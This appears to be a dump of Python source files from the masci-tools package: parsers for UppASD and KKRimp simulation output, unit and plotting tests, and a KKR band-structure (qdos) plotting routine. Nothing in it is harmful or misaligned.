# Find the name of the tar.gz file and pick the first one found, as there should only be one
file_name=glob.glob(path+'/'+"*.tar.gz")[0]
tar_data=tarfile.open(file_name)
names=tar_data.getnames()
members=tar_data.getmembers()
# Find the first file which corresponds to the pattern that one is searching for
tmp_name=pd.Series(names)
target_file=tmp_name[tmp_name.str.match(file_prefix)].values
# Make sure the suffix is included too
target_file = [s for s in target_file if file_suffix in s]
ind=names.index(target_file[0])
data_file = tar_data.extractfile(members[ind])
else:
data_file=glob.glob(path+'/'+file_prefix+'*'+file_suffix)[0]
(skiprows,columns)=set_format(data_file,file_prefix,zipped)
# Extract the needed data
data=pd.read_csv(data_file,header=None,delim_whitespace=True, \
usecols=columns,skiprows=skiprows).values
return data
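# Hedged usage sketch (not part of the original module); the folder name is an assumption:
#   coords = file_handler('./run_001', zipped=False, file_prefix='coord')
#   moments = file_handler('./run_001', zipped=False, file_prefix='restart')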
def set_format(data_file,file_prefix,zipped):
"""Function to determine if the UppASD data is in the new or legacy format. Determines the number of columns that are used and the number of rows that must be skipped.
Args
----------
- data_file: file identifier which is currently being read.
- file_preffix: (str) name of file which is being read.
- zipped: (boolean) indicating if the data is in a tar.gz
Returns
----------
- skiprows: (int) number of lines to be skipped when read
- columns: (list) list with the number of the columns that are read for each type of file
Author
----------
<NAME>
"""
import numpy as np
import pandas as pd
line = pd.read_csv(data_file,header=None,delim_whitespace=True,nrows=1, \
usecols=[0]).values
try:
data_file.seek(0)
except:
pass
#---------------------------------------------------------------------------
# Check whether the file is in the new or old fmt
#---------------------------------------------------------------------------
try:
comp=str(line[0,0])[0]
except:
comp=str(line)
if comp=='#':
type_fmt='new'
else:
type_fmt='old'
if file_prefix=='coord':
columns=[1,2,3]
skiprows=0
if file_prefix=='restart':
if type_fmt=='new':
columns=[4,5,6]
skiprows=7
else:
columns=[3,4,5]
skiprows=1
if file_prefix=='moment':
if type_fmt=='new':
columns=[0,4,5,6]
skiprows=7
else:
columns=[0,2,3,4]
skiprows=0
if file_prefix=='posfile_clus':
columns=[2,3,4]
skiprows=0
if file_prefix=='totenergy':
columns=[1]
skiprows=1
if file_prefix=='rate_if':
columns=[0,1]
skiprows=1
if file_prefix=='enfit_path':
columns=[1,2]
skiprows=1
if file_prefix=='localenergy':
skiprows=1
columns=[3,4,6]
return skiprows,columns
``` |
{
"source": "JPchico/masci-tools",
"score": 2
} |
#### File: io/parsers/kkrimp_parser_functions.py
```python
from __future__ import print_function, division
from __future__ import absolute_import
from builtins import object
from numpy import array, ndarray, loadtxt
from masci_tools.io.common_functions import search_string, open_general, get_version_info, get_Ry2eV, convert_to_pystd
from masci_tools.io.parsers.kkrparser_functions import get_rms, find_warnings, get_charges_per_atom, get_core_states
from six.moves import range
__copyright__ = (u"Copyright (c), 2018, Forschungszentrum Jülich GmbH,"
"IAS-1/PGI-1, Germany. All rights reserved.")
__license__ = "MIT license, see LICENSE.txt file"
__version__ = "0.5"
__contributors__ = (u"<NAME>",
u"<NAME>")
####################################################################################
class kkrimp_parser_functions(object):
"""
Class of parser functions for KKRimp calculation
    :usage: success, msg_list, out_dict = kkrimp_parser_functions().parse_kkrimp_outputfile(out_dict, files)
"""
### some helper functions ###
def _get_econt_info(self, out_log):
"""
extract energy contour information from out_log file
:param out_log: file that is parsed
        :returns: econt (dict), dictionary containing the energy contour info
:note: econt contains the following keys
* 'emin', bottom of energy contour
* 'Nepts', number of points in energy contour
* 'epts', list of complex valued energy points
* 'weights', list of complex valued weights for energy integration
"""
f = open_general(out_log)
tmptxt = f.readlines()
f.close()
econt = {}
itmp = search_string('[read_energy] number of energy points', tmptxt)
if itmp>=0: econt['Nepts'] = int(tmptxt.pop(itmp).split()[-1])
itmp = search_string('energies and weights are:', tmptxt)
if itmp>=0:
tmp = []
for ie in range(econt['Nepts']):
tmpline = tmptxt[itmp+4+ie].split()[1:]
tmp.append([float(tmpline[0]), float(tmpline[1]), float(tmpline[2]), float(tmpline[3])])
tmp = array(tmp)
econt['epts'] = tmp[:,:2]
econt['weights'] = tmp[:,2:]
econt['emin'] = tmp[0,0]
return econt
def _get_scfinfo(self, file):
"""
        extract scf info (number of iterations, max number of iterations, mixing info) from file
:param file:
:returns: niter (int), nitermax (int), converged (bool), nmax_reached (bool), mixinfo (dict)
:note: mixinfo contains information on mixing scheme and mixing factor used in the calculation
"""
f = open_general(file)
tmptxt = f.readlines()
f.close()
# get rms and number of iterations
itmp, niter, rms = 0, -1, -1
while itmp >= 0:
itmp = search_string('average rms-error', tmptxt)
if itmp >= 0:
tmp = tmptxt.pop(itmp).replace('D', 'E').split()
niter = int(tmp[1])
rms = float(tmp[-1])
# get max number of scf steps
itmp = search_string('SCFSTEPS', tmptxt)
if itmp >= 0:
nitermax = int(tmptxt.pop(itmp).split()[-1])
# get qbound
itmp = search_string('QBOUND', tmptxt)
if itmp >= 0:
qbound = float(tmptxt.pop(itmp).split()[-1])
# get imix
itmp = search_string('IMIX', tmptxt)
if itmp >= 0:
imix = int(tmptxt.pop(itmp).split()[-1])
# get mixfac
itmp = search_string('MIXFAC', tmptxt)
if itmp >= 0:
mixfac = float(tmptxt.pop(itmp).split()[-1])
# get fcm
itmp = search_string('FCM', tmptxt)
if itmp >= 0:
fcm = float(tmptxt.pop(itmp).split()[-1])
# set mixinfo
mixinfo = [imix, mixfac, qbound, fcm]
# set converged and nmax_reached logicals
converged, nmax_reached = False, False
if nitermax==niter: nmax_reached = True
if rms<qbound: converged = True
# return values
return niter, nitermax, converged, nmax_reached, mixinfo
def _get_newsosol(self, file):
"""
Check if spin orbit coupling solver is used
:param file: absolute path to out_log.000.txt of KKRimp calculation
:returns: True(False) if SOC solver is (not) used
"""
f = open_general(file)
tmptxt = f.readlines()
f.close()
itmp = search_string('Spin orbit coupling used?', tmptxt)
itmp = int(tmptxt.pop(itmp).split()[-1])
if itmp==1:
newsosol = True
else:
newsosol = False
return newsosol
def _get_natom(self, file):
"""
Extract number of atoms in impurity cluster
:param file: file that is parsed to find number of atoms
:returns: natom (int), number of atoms in impurity cluster
"""
f = open_general(file)
tmptxt = f.readlines()
f.close()
itmp = search_string('NATOM is', tmptxt)
natom = int(tmptxt.pop(itmp).split()[-1])
return natom
def _get_magtot(self, file):
"""
        Extract total magnetic moment of all atoms in the impurity cluster
:param file: file that is parsed to find magnetic moments
:returns: list of total magnetic moments of all atoms
"""
#TODO implement
return []
def _extract_timings(self, outfile):
"""
Extract timings for the different parts in the KKRimp code
:param outfile: timing file of the KKRimp run
:returns: res (dict) timings in seconds, averaged over iterations
"""
f = open_general(outfile)
tmptxt = f.readlines()
f.close()
search_keys = ['time until scf starts',
'vpot->tmat',
'gref->gmat',
'gonsite->density',
'energyloop',
'Iteration number',
'Total running time']
res = {}
for isearch in search_keys:
tmpval = []
itmp = 0
while itmp>=0:
itmp = search_string(isearch, tmptxt)
if itmp>=0:
tmpval.append(float(tmptxt.pop(itmp).split()[-1]))
if len(tmpval)>0:
res[isearch] = tmpval
# average over iterations
niter = len(res.get(search_keys[-2], []))
if niter>0:
for key in search_keys[1:6]:
res[key] = sum(res[key])/niter
for key in [search_keys[0], search_keys[-1]]:
res[key] = res[key][0]
return res
def _get_nspin(self, file):
"""
Extract nspin from file
:param file: file that is parsed
:returns: 1 if calculation is paramagnetic, 2 otherwise
"""
f = open_general(file)
tmptxt = f.readlines()
f.close()
itmp = search_string('NSPIN', tmptxt)
nspin = int(tmptxt.pop(itmp).split()[-1])
return nspin
def _get_spinmom_per_atom(self, file, natom):
"""
Extract spin moment for all atoms
:param file: file that is parsed
:param natom: number of atoms in impurity cluster
:returns: spinmom_at (list), spin moments for all atoms
"""
#TODO implement
        return []  # placeholder: spin moment parsing not yet implemented
def _get_orbmom_per_atom(self, file, natom):
"""
Extract orbital moment for all atoms
:param file: file that is parsed
:param natom: number of atoms in impurity cluster
:returns: orbmom_at (list), orbital moments for all atoms
"""
#TODO implement
        return []  # placeholder: orbital moment parsing not yet implemented
def _get_EF_potfile(self, potfile):
"""
Extract EF value from potential file
:param potfile: file that is parsed
:returns: EF (float), value of the Fermi energy in Ry
"""
f = open_general(potfile)
tmptxt = f.readlines()
f.close()
EF = float(tmptxt[3].split()[1])
return EF
def _get_Etot(self, file):
"""
Extract total energy file
:param file: file that is parsed
:returns: Etot (list), values of the total energy in Ry for all iterations
"""
f = open_general(file)
tmptxt = f.readlines()
f.close()
itmp = 0
Etot = []
while itmp >= 0:
itmp = search_string('TOTAL ENERGY', tmptxt)
if itmp >= 0:
Etot.append(float(tmptxt.pop(itmp).split()[-1]))
return Etot
def _get_energies_atom(self, file1, file2, natom):
"""
Extract single particle and total energies in Ry for all atoms from file 1 and file 2
:param file1: file containing all single particle energies
:param file2: file containing all total energies
:returns: esp_at (list), etot_at (list)
"""
esp = loadtxt(file1)
etot = loadtxt(file2)
esp_at = esp[-natom:,1]
etot_at = etot[-natom:,1]
return esp_at, etot_at
### end helper functions ###
def parse_kkrimp_outputfile(self, out_dict, file_dict):
"""
Main parser function for kkrimp, read information from files in file_dict and fills out_dict
:param out_dict: dictionary that is filled with parsed output of the KKRimp calculation
:param file_dict: dictionary of files that are parsed
:returns: success (bool), msg_list(list of error/warning messages of parser), out_dict (filled dict of parsed output)
:note: file_dict should contain the following keys
* 'outfile', the std_out of the KKRimp calculation
* 'out_log', the out_log.000.txt file
* 'out_pot', the output potential
* 'out_enersp_at', the out_energysp_per_atom_eV file
* 'out_enertot_at', the out_energytotal_per_atom_eV file
* 'out_timing', the timing file
* 'kkrflex_llyfac', the file for the Lloyd factor
* 'kkrflex_angles', the nonco_angles file for the KKRimp calculation
* 'out_spinmoms', the output spin moments file
* 'out_orbmoms', the output orbital moments file
"""
Ry2eV = get_Ry2eV()
msg_list = []
files = file_dict
try:
code_version, compile_options, serial_number = get_version_info(files['out_log'])
tmp_dict = {}
tmp_dict['code_version'] = code_version
tmp_dict['compile_options'] = compile_options
tmp_dict['calculation_serial_number'] = serial_number
out_dict['code_info_group'] = tmp_dict
except:
msg = "Error parsing output of KKRimp: Version Info"
msg_list.append(msg)
tmp_dict = {} # used to group convergence info (rms, rms per atom, charge neutrality)
# also initialize convergence_group where all info stored for all iterations is kept
out_dict['convergence_group'] = tmp_dict
try:
result, result_atoms_last = get_rms(files['outfile'], files['out_log'])
tmp_dict['rms'] = result[-1]
tmp_dict['rms_all_iterations'] = result
tmp_dict['rms_per_atom'] = result_atoms_last
tmp_dict['rms_unit'] = 'unitless'
out_dict['convergence_group'] = tmp_dict
except:
msg = "Error parsing output of KKRimp: rms-error"
msg_list.append(msg)
tmp_dict = {} # used to group magnetism info (spin and orbital moments)
try:
result = self._get_magtot(files['out_log'])
if len(result)>0:
tmp_dict['total_spin_moment'] = result[-1]
out_dict['convergence_group']['total_spin_moment_all_iterations'] = result
tmp_dict['total_spin_moment_unit'] = 'mu_Bohr'
out_dict['magnetism_group'] = tmp_dict
except:
msg = "Error parsing output of KKRimp: total magnetic moment"
msg_list.append(msg)
try:
nspin = self._get_nspin(files['out_log'])
natom = self._get_natom(files['out_log'])
newsosol = self._get_newsosol(files['out_log'])
out_dict['nspin'] = nspin
out_dict['number_of_atoms_in_unit_cell'] = natom
out_dict['use_newsosol'] = newsosol
except:
msg = "Error parsing output of KKRimp: nspin/natom"
msg_list.append(msg)
try:
if nspin>1:
#result, vec, angles = get_spinmom_per_atom(outfile, natom, nonco_out_file)
spinmom_atom, spinmom_atom_vec_all_iter, = self._get_spinmom_per_atom(files['out_spinmom'], natom)
if len(result)>0:
tmp_dict['spin_moment_per_atom'] = result[-1,:]
if newsosol:
tmp_dict['spin_moment_vector_per_atom'] = vec[:]
tmp_dict['spin_moment_angles_per_atom'] = angles[:]
tmp_dict['spin_moment_angles_per_atom_unit'] = 'degree'
out_dict['convergence_group']['spin_moment_per_atom_all_iterations'] = result[:,:]
tmp_dict['spin_moment_unit'] = 'mu_Bohr'
out_dict['magnetism_group'] = tmp_dict
except:
msg = "Error parsing output of KKRimp: spin moment per atom"
msg_list.append(msg)
# add orbital moments to magnetism group in parser output
try:
if nspin>1 and newsosol:
result = self._get_orbmom_per_atom(files['out_orbmom'], natom)
if len(result)>0:
tmp_dict['total_orbital_moment'] = sum(result[-1,:])
tmp_dict['orbital_moment_per_atom'] = result[-1,:]
out_dict['convergence_group']['orbital_moment_per_atom_all_iterations'] = result[:,:]
tmp_dict['orbital_moment_unit'] = 'mu_Bohr'
out_dict['magnetism_group'] = tmp_dict
except:
msg = "Error parsing output of KKRimp: orbital moment"
msg_list.append(msg)
try:
result = self._get_EF_potfile(files['out_pot'])
out_dict['fermi_energy'] = result
out_dict['fermi_energy_units'] = 'Ry'
except:
msg = "Error parsing output of KKRimp: EF"
msg_list.append(msg)
try:
result = self._get_Etot(files['out_log'])
print(result)
out_dict['energy'] = result[-1]*Ry2eV
out_dict['energy_unit'] = 'eV'
out_dict['total_energy_Ry'] = result[-1]
out_dict['total_energy_Ry_unit'] = 'Rydberg'
out_dict['convergence_group']['total_energy_Ry_all_iterations'] = result
except:
msg = "Error parsing output of KKRimp: total energy"
msg_list.append(msg)
try:
result = find_warnings(files['outfile'])
tmp_dict = {}
tmp_dict['number_of_warnings'] = len(result)
tmp_dict['warnings_list'] = result
out_dict['warnings_group'] = tmp_dict
except:
msg = "Error parsing output of KKRimp: search for warnings"
msg_list.append(msg)
try:
result = self._extract_timings(files['out_timing'])
out_dict['timings_group'] = result
out_dict['timings_unit'] = 'seconds'
except:
msg = "Error parsing output of KKRimp: timings"
msg_list.append(msg)
try:
esp_at, etot_at = self._get_energies_atom(files['out_enersp_at'], files['out_enertot_at'], natom)
out_dict['single_particle_energies'] = esp_at*Ry2eV
out_dict['single_particle_energies_unit'] = 'eV'
out_dict['total_energies_atom'] = etot_at*Ry2eV
out_dict['total_energies_atom_unit'] = 'eV'
except:
msg = "Error parsing output of KKRimp: single particle energies"
msg_list.append(msg)
try:
result_WS, result_tot, result_C = get_charges_per_atom(files['out_log'])
niter = len(out_dict['convergence_group']['rms_all_iterations'])
natyp = int(len(result_tot)//niter)
out_dict['total_charge_per_atom'] = result_WS[-natyp:]
out_dict['charge_core_states_per_atom'] = result_C[-natyp:]
# this check deals with the DOS case where output is slightly different
if len(result_WS) == len(result_C):
out_dict['charge_valence_states_per_atom'] = result_WS[-natyp:]-result_C[-natyp:]
out_dict['total_charge_per_atom_unit'] = 'electron charge'
out_dict['charge_core_states_per_atom_unit'] = 'electron charge'
out_dict['charge_valence_states_per_atom_unit'] = 'electron charge'
except:
msg = "Error parsing output of KKRimp: charges"
msg_list.append(msg)
try:
econt = self._get_econt_info(files['out_log'])
tmp_dict = {}
tmp_dict['emin'] = econt.get('emin')
tmp_dict['emin_unit'] = 'Rydberg'
tmp_dict['number_of_energy_points'] = econt.get('Nepts')
tmp_dict['epoints_contour'] = econt.get('epts')
tmp_dict['epoints_contour_unit'] = 'Rydberg'
tmp_dict['epoints_weights'] = econt.get('weights')
out_dict['energy_contour_group'] = tmp_dict
except:
msg = "Error parsing output of KKRimp: energy contour"
msg_list.append(msg)
try:
ncore, emax, lmax, descr_max = get_core_states(files['out_pot'])
tmp_dict = {}
tmp_dict['number_of_core_states_per_atom'] = ncore
tmp_dict['energy_highest_lying_core_state_per_atom'] = emax
tmp_dict['energy_highest_lying_core_state_per_atom_unit'] = 'Rydberg'
tmp_dict['descr_highest_lying_core_state_per_atom'] = descr_max
out_dict['core_states_group'] = tmp_dict
except:
msg = "Error parsing output of KKRimp: core_states"
msg_list.append(msg)
try:
niter, nitermax, converged, nmax_reached, mixinfo = self._get_scfinfo(files['out_log'])
out_dict['convergence_group']['number_of_iterations'] = niter
out_dict['convergence_group']['number_of_iterations_max'] = nitermax
out_dict['convergence_group']['calculation_converged'] = converged
out_dict['convergence_group']['nsteps_exhausted'] = nmax_reached
out_dict['convergence_group']['imix'] = mixinfo[0]
out_dict['convergence_group']['strmix'] = mixinfo[1]
out_dict['convergence_group']['qbound'] = mixinfo[2]
out_dict['convergence_group']['fcm'] = mixinfo[3]
out_dict['convergence_group']['brymix'] = mixinfo[1]
except:
msg = "Error parsing output of KKRimp: scfinfo"
msg_list.append(msg)
#convert numpy arrays to standard python lists
out_dict = convert_to_pystd(out_dict)
# return output with error messages if there are any
if len(msg_list)>0:
return False, msg_list, out_dict
else:
return True, [], out_dict
```
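A minimal usage sketch for the parser methods above; the import path, class name and file names are assumptions inferred from the docstring of `parse_kkrimp_outputfile`, not verified against the package.

```python
# Hypothetical names: the module path, class name and file names below are assumptions.
from masci_tools.io.parsers.kkrimp_parser_functions import KkrimpParserFunctions

file_dict = {
    'outfile': 'out_kkrimp',                          # std_out of the KKRimp run
    'out_log': 'out_log.000.txt',
    'out_pot': 'out_potential',
    'out_enersp_at': 'out_energysp_per_atom_eV',
    'out_enertot_at': 'out_energytotal_per_atom_eV',
    'out_timing': 'out_timing.000.txt',
    'kkrflex_llyfac': 'kkrflex_llyfac',
    'kkrflex_angles': 'kkrflex_angles',
    'out_spinmoms': 'out_magneticmoments.txt',
    'out_orbmoms': 'out_orbitalmoments.txt',
}

parser = KkrimpParserFunctions()
# out_dict starts empty and is filled by the parser; errors are collected, not raised.
success, messages, out_dict = parser.parse_kkrimp_outputfile({}, file_dict)
if not success:
    print('KKRimp parser reported problems:', messages)
```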
#### File: masci_tools/tests/test_common_functions.py
```python
from __future__ import division
from __future__ import absolute_import
from builtins import object
import pytest
from masci_tools.io.common_functions import (interpolate_dos, get_alat_from_bravais,
search_string, angles_to_vec,
vec_to_angles, get_version_info,
get_corestates_from_potential,
get_highest_core_state,
get_ef_from_potfile, open_general,
convert_to_pystd)
class Test_common_functions(object):
"""
Tests for the common functions from tools.common_functions
"""
def test_open_general(self):
path = '../tests/files/kkr/kkr_run_slab_nosoc/out_kkr'
f = open_general(path)
l1 = len(f.readlines())
f = open_general(f)
l2 = len(f.readlines())
assert l1==l2
assert l2>0
def test_interpolate_dos(self):
from numpy import load, loadtxt, shape
d0 = '../tests/files/interpol/complex.dos'
ef, dos, dos_int = interpolate_dos(d0, return_original=True)
assert ef == 0.5256
dos_ref = loadtxt('../tests/files/interpol/new3.dos')
assert (dos_int.reshape(shape(dos_ref))-dos_ref).max()<10**-4
assert (dos == load('../tests/files/interpol/ref_dos.npy')).all()
def test_interpolate_dos_filehandle(self):
from numpy import load, loadtxt, shape
d0 = open('../tests/files/interpol/complex.dos')
d0 = '../tests/files/interpol/complex.dos'
ef, dos, dos_int = interpolate_dos(d0, return_original=True)
assert ef == 0.5256
dos_ref = loadtxt('../tests/files/interpol/new3.dos')
assert (dos_int.reshape(shape(dos_ref))-dos_ref).max()<10**-4
assert (dos == load('../tests/files/interpol/ref_dos.npy')).all()
def test_get_alat_from_bravais(self):
from numpy import array, sqrt
bravais = array([[0.0, 0.5, 0.5], [0.5, 0.0, 0.5], [0.5, 0.5, 0.0]])
alat = get_alat_from_bravais(bravais)
assert abs(alat - sqrt(2)/2) < 10**-10
def test_search_string(self):
txt = open('files/kkr/kkr_run_dos_output/output.0.txt', 'r').readlines()
alatline = search_string('ALAT', txt)
noline = search_string('ALT', txt)
assert alatline == 23
assert noline == -1
def test_angles_to_vec(self):
from numpy import pi, sqrt, array, sum
vec = angles_to_vec(2., 45./180.*pi, 45./180.*pi)
assert abs(vec[0] - 1.) < 10**-10
assert abs(vec[1] - 1.) < 10**-10
assert abs(vec[2] - sqrt(2)) < 10**-10
vec = angles_to_vec(array([2., 3.]), array([45./180.*pi, pi]), array([45./180.*pi, pi/2]))
assert sum(abs(vec - array([[1., 1., sqrt(2)], [0, 0, -3]]))) < 10**-10
def test_vec_to_angles(self):
from numpy import array, sqrt, sum, pi
m, t, p = vec_to_angles(array([[0, 0, 1], [1, 1, sqrt(2)]]))
assert sum(abs(m - array([1, 2]))) < 10**-10
assert sum(abs(t - array([0, pi/4.]))) < 10**-10
assert sum(abs(p - array([0, pi/4.]))) < 10**-10
m, t, p = vec_to_angles([1, 1, sqrt(2)])
assert (m, t, p) == (2, pi/4., pi/4.)
def test_get_version_info(self):
version = get_version_info('files/kkr/kkr_run_dos_output/output.0.txt')
assert version == ('v2.2-22-g4f8f5ff', 'openmp-mac', 'kkrjm_v2.2-22-g4f8f5ff_openmp-mac_20171214102522')
def test_get_corestates_from_potential(self):
from numpy import sum, array
corestates = get_corestates_from_potential('files/kkr/kkr_run_dos_output/out_potential')
ref = ([8, 8, 8, 8],
[array([-1866.96096949, -275.8348967 , -50.32089052, -6.5316706 , -248.12312965, -41.13200278, -3.832432 , -26.5129925 ]),
array([-1866.96096949, -275.8348967 , -50.32089052, -6.5316706 , -248.12312965, -41.13200278, -3.832432 , -26.5129925 ]),
array([-1866.96096949, -275.8348967 , -50.32089052, -6.5316706 , -248.12312965, -41.13200278, -3.832432 , -26.5129925 ]),
array([-1866.96096949, -275.8348967 , -50.32089052, -6.5316706 , -248.12312965, -41.13200278, -3.832432 , -26.5129925 ])],
[array([0, 0, 0, 0, 1, 1, 1, 2]),
array([0, 0, 0, 0, 1, 1, 1, 2]),
array([0, 0, 0, 0, 1, 1, 1, 2]),
array([0, 0, 0, 0, 1, 1, 1, 2])])
assert corestates[0] == ref[0]
assert sum(abs(array(corestates[1]) - array(ref[1]))) < 10**-7
assert sum(abs(array(corestates[2]) - array(ref[2]))) < 10**-7
def test_get_highest_core_state(self):
from numpy import array
ncore = 8
ener = array([-1866.96096949, -275.8348967 , -50.32089052, -6.5316706 , -248.12312965, -41.13200278, -3.832432 , -26.5129925 ])
lval = array([0, 0, 0, 0, 1, 1, 1, 2])
out = get_highest_core_state(ncore, ener, lval)
assert out == (1, -3.832432, '4p')
def test_get_ef_from_potfile(self):
ef = get_ef_from_potfile('files/kkr/kkr_run_dos_output/out_potential')
assert ef == 1.05
def test_convert_to_pystd(self):
import numpy as np
test = {'list': [0,1,2], 'nparray': np.array([0,1,2]), 'nparray_conv_list': list(np.array([0,1,2])),
'int': 9, 'float': 0.9, 'np.int': np.int64(8), 'np.float': np.float128(9),
'dict':{'list':[0,1,2], 'nparray': np.array([0,1,2]), 'nparray_conv_list': list(np.array([0,1,2])),
'int': 9, 'float': 0.9, 'np.int': np.int64(8), 'np.float': np.float128(9),
'dict':{'list':[0,1,2], 'nparray': np.array([0,1,2]), 'nparray_conv_list': list(np.array([0,1,2])),
'int': 9, 'float': 0.9, 'np.int': np.int64(8), 'np.float': np.float128(9)}
}
}
# make a copy and convert the dict
test1 = test.copy()
test1 = convert_to_pystd(test1)
print('original ', test)
print('converted', test1)
# extract datatypes for comparison
for i in ['list', 'nparray', 'nparray_conv_list', 'int', 'float', 'np.int', 'np.float']:
ii = test[i]
if i=='list':
out0 = []
print(i, type(ii))
out0.append(type(ii))
if i in ['list', 'nparray', 'nparray_conv_list']:
for j in ii:
print(j, type(j))
out0.append(type(j))
# converted datatypes:
ii = test1[i]
if i=='list':
out = []
print(i, type(ii))
out.append(type(ii))
if i in ['list', 'nparray', 'nparray_conv_list']:
for j in ii:
print(j, type(j))
out.append(type(j))
# now compare datatypes:
assert out0 == [list, int, int, int, np.ndarray, np.int64, np.int64,
np.int64, list, int, int, int, int, float, np.int64, np.float128]
assert out == [list, int, int, int, list, int, int, int, list, int, int, int, int, float, int, float]
```
#### File: masci_tools/tests/test_kkr_plotting.py
```python
from __future__ import absolute_import
from builtins import object
import pytest
# prevent issue with not having a display on travis-ci
# this needs to go *before* pyplot imports
import matplotlib
from six.moves import range
matplotlib.use('Agg')
from matplotlib.pyplot import gcf, title
from masci_tools.io.kkr_read_shapefun_info import read_shapefun
from masci_tools.vis.kkr_plot_shapefun import plot_shapefun
from masci_tools.vis.kkr_plot_dos import dosplot
from masci_tools.vis.kkr_plot_bandstruc_qdos import dispersionplot
from masci_tools.vis.kkr_plot_FS_qdos import FSqdos2D
class Test_kkr_plotting(object):
"""
Test for KKR plotting functions
"""
@pytest.mark.mpl_image_compare(baseline_dir='files/voronoi/', filename='test.png')
def test_plot_shapefun(self):
# clear previous figure, if still there
gcf().clear()
pos, out = read_shapefun('files/voronoi/')
plot_shapefun(pos, out, 'all')
# need to return the figure in order for mpl checks to work
return gcf()
@pytest.mark.mpl_image_compare(baseline_dir='files/kkr/kkr_run_dos_output/', filename='test.png')
def test_plot_dos(self):
gcf().clear()
dosplot('files/kkr/kkr_run_dos_output/')
return gcf()
@pytest.mark.mpl_image_compare(baseline_dir='files/kkr/kkr_run_dos_output/', filename='test2.png')
def test_plot_dos2(self):
gcf().clear()
dosplot('files/kkr/kkr_run_dos_output/', units='eV_rel', nofig=True, allatoms=True, totonly=False)
return gcf()
@pytest.mark.mpl_image_compare(baseline_dir='files/kkr/kkr_run_dos_output/', filename='test3.png')
def test_plot_dos3(self):
gcf().clear()
dosplot('files/kkr/kkr_run_dos_output/', units='eV_rel', nofig=True, allatoms=True, filled=True, normalized=True, xyswitch=True, color='r')
return gcf()
@pytest.mark.mpl_image_compare(baseline_dir='files/kkr/kkr_run_dos_output/', filename='test4.png')
def test_plot_dos4(self):
gcf().clear()
dosplot('files/kkr/kkr_run_dos_output/', units='eV_rel', nofig=True, allatoms=True, lm=list(range(1,5)))
return gcf()
@pytest.mark.mpl_image_compare(baseline_dir='files/kkr/kkr_run_qdos/', filename='test.png')
def test_plot_qdos(self):
gcf().clear()
dispersionplot('files/kkr/kkr_run_qdos', reload_data=True); title('')
return gcf()
@pytest.mark.mpl_image_compare(baseline_dir='files/kkr/kkr_run_qdos/', filename='test2.png')
def test_plot_qdos2(self):
gcf().clear()
dispersionplot('files/kkr/kkr_run_qdos', reload_data=True, ratios=False, units='eV_rel', clrbar=False); title('')
return gcf()
@pytest.mark.mpl_image_compare(baseline_dir='files/kkr/kkr_run_qdos_FS/', filename='test.png')
def test_plot_qdos_FS(self):
gcf().clear()
FSqdos2D('files/kkr/kkr_run_qdos_FS/', reload_data=True)
return gcf()
```
#### File: masci_tools/vis/kkr_plot_bandstruc_qdos.py
```python
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from matplotlib import cm
from six.moves import range
def dispersionplot(p0='./', totonly=True, s=20, ls_ef= ':', lw_ef=1, units='eV_rel', noefline=False,
color='', reload_data=False, clrbar=True, logscale=True, nosave=False, atoms=[],
ratios=False, atoms2=[], noscale=False, newfig=False, cmap=None, alpha=1.0,
qcomponent=-2, clims=[], xscale=1., raster=True, atoms3=[], alpha_reverse=False,
return_data=False, xshift=0, yshift=0, plotmode='pcolor', ptitle=None, ef=None,
as_e_dimension=None, scale_alpha_data=False):
""" plotting routine for qdos files - dispersion (E vs. q) """
# import dependencies
from numpy import loadtxt, load, save, log, abs, sum, sort, pi, shape, array
from matplotlib.pyplot import figure, plot, axvline, scatter, axhline, xlabel, ylabel, title, colorbar, pcolormesh, clim, cm
from os import listdir, getcwd
from os.path import isdir, getctime
from time import ctime
from subprocess import check_output
from numpy import linspace
from matplotlib.colors import ListedColormap
# deal with input of file handle instead of path (see plot_kkr of aiida_kkr)
if type(p0)!=str:
pathname_with_file = p0.name
p0 = pathname_with_file.replace('/qdos.01.1.dat','') #dos.atom1
if cmap==None:
cmap = cm.viridis
if newfig: figure()
# read in data
if p0[-1]!='/': p0+='/'
# read EF if not given as input
if ef is None:
if 'potential' in listdir(p0):
ef = float(open(p0+'potential').readlines()[3].split()[1])
else:
ef = 0
alat = float(check_output('grep ALATBASIS '+p0+'inputcard', shell=True).decode('utf-8').split('=')[1].split()[0])
a0 = 2*pi/alat/0.52918
if noscale: a0 = 1.
if reload_data or 'saved_data_dispersion.npy' not in sort(listdir(p0)):
first=True
first2=True
first3=True
print('reading qdos')
j = 0
for i in sort(listdir(p0)):
if 'qdos.' in i[:5] and not isdir(p0+i):
iatom = i.replace('qdos.','').split('.')[0]
if atoms==[] or int(iatom) in atoms:
j += 1
print(j,p0,i)
tmp = loadtxt(p0+i)
tmp[:,2:5] = tmp[:,2:5]
if first:
d = tmp
first=False
else:
d[:,5:]+=tmp[:,5:]
if ratios and (atoms2==[] or int(iatom) in atoms2):
j += 1
print(j,p0,i, 'atoms2=', atoms2)
tmp = loadtxt(p0+i)
tmp[:,2:5] = tmp[:,2:5]
if first2:
d2 = tmp
first2=False
else:
d2[:,5:]+=tmp[:,5:]
if (atoms3==[] or int(iatom) in atoms3) and ratios:
j += 1
print(j,p0,i, 'atoms3=', atoms3)
tmp = loadtxt(p0+i)
tmp[:,2:5] = tmp[:,2:5]
if first3:
d3 = tmp
first3=False
else:
d3[:,5:]+=tmp[:,5:]
if not nosave: save(p0+'saved_data_dispersion', d)
else:
print('loading data')#,'qdos files created on:',ctime(getctime('qdos.01.1.dat')), '.npy file created on:', ctime(getctime('saved_data_dispersion.npy'))
d = load(p0+'saved_data_dispersion.npy')
d[:,2:5] = d[:,2:5]*a0
if ratios:
d2[:,2:5] = d2[:,2:5]*a0
d3[:,2:5] = d3[:,2:5]*a0
# set units and axis labels
if 'eV' in units:
d[:,0] = d[:,0]*13.6
d[:,5:] = d[:,5:]/13.6
ef = ef*13.6
if 'rel' in units:
d[:,0] = d[:,0]-ef
ef = 0
if ratios:
if 'eV' in units:
d2[:,5:] = d2[:,5:]/13.6
d3[:,5:] = d3[:,5:]/13.6
ylab = r'E (Ry)'
xlab = r'k'
if units=='eV':
ylab = r'E (eV)'
elif units=='eV_rel':
ylab = r'E-E_F (eV)'
elif units=='Ry_rel':
ylab = r'E-E_F (Ry)'
# plot dos
if totonly:
data = abs(sum(d[:,5:], axis=1))
else:
data = abs(d[:,5:])
if logscale: data = log(data)
x, y = xscale*sum(d[:,2:5], axis=1), d[:,0]
if qcomponent==-2:
el = len(set(d[:,0]))
if el==1 and as_e_dimension is not None:
y = d[:,2+as_e_dimension]
el = len(set(y))
ylab = r'k (1/Ang.)'
